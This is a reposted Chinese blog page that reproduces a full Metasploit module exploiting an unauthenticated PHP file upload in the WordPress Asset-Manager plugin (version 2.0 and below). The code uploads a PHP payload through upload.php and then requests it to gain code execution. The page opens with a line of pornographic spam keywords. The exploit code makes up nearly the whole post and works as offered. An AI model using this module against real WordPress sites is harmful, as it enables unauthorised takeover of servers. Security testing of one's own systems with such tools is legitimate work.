日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程语言 > php >内容正文

php

wordpress漏洞上传php文件夹,WordPress Asset-Manager PHP文件上传漏洞

發布時間:2023/12/10 php 39 豆豆
生活随笔 收集整理的這篇文章主要介紹了 wordpress漏洞上传php文件夹,WordPress Asset-Manager PHP文件上传漏洞 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

這個模塊利用Metasploi脆弱漏洞庫在WordPress版本Asset-Manager插件2.0以及以下版本發現的。允許上傳php文件、一用戶可以上傳一個文件到一個臨時目錄沒有身份驗證,從而導致執行任意代碼。

##

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

#?? http://metasploit.com/framework/

##

require 'msf/core'

require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

include Msf::Exploit::PhpEXE

def initialize(info = {})

super(update_info(info,

'Name'?????????? => 'WordPress Asset-Manager PHP File Upload Vulnerability',

'Description'??? => %q{

This module exploits a vulnerability found in Asset-Manager <= 2.0? WordPress

plugin.? By abusing the upload.php file, a malicious user can upload a file to a

temp directory without authentication, which results in arbitrary code execution.

},

'Author'???????? =>

[

'Sammy FORGIT', # initial discovery

'James Fitts ' # metasploit module

],

'License'??????? => MSF_LICENSE,

'References'???? =>

[

[ 'OSVDB', '82653' ],

[ 'BID', '53809' ],

[ 'EDB', '18993' ],

[ 'URL', 'http://www.hack1990.com/' ]

],

'Payload'?????? =>

{

'BadChars' => "\x00",

},

'Platform'?????? => 'php',

'Arch'?????????? => ARCH_PHP,

'Targets'??????? =>

[

[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],

[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]

],

'DefaultTarget' => 0,

'DisclosureDate' => 'May 26 2012'))

register_options(

[

OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])

], self.class)

end

def exploit

uri =? target_uri.path

uri << '/' if uri[-1,1] != '/'

peer = "#{rhost}:#{rport}"

payload_name = "#{rand_text_alpha(5)}.php"

php_payload = get_write_exec_payload(:unlink_self=>true)

data = Rex::MIME::Message.new

data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")

post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

print_status("#{peer} - Uploading payload #{payload_name}")

res = send_request_cgi({

'method'? => 'POST',

'uri'???? => "#{uri}wp-content/plugins/asset-manager/upload.php",

'ctype'?? => "multipart/form-data; boundary=#{data.bound}",

'data'??? => post_data

})

if not res or res.code != 200 or res.body !~ /#{payload_name}/

fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")

end

print_status("#{peer} - Executing payload #{payload_name}")

res = send_request_raw({

'uri'???? => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",

'method'? => 'GET'

})

if res and res.code != 200

fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")

end

end

end

總結

以上是生活随笔為你收集整理的wordpress漏洞上传php文件夹,WordPress Asset-Manager PHP文件上传漏洞的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。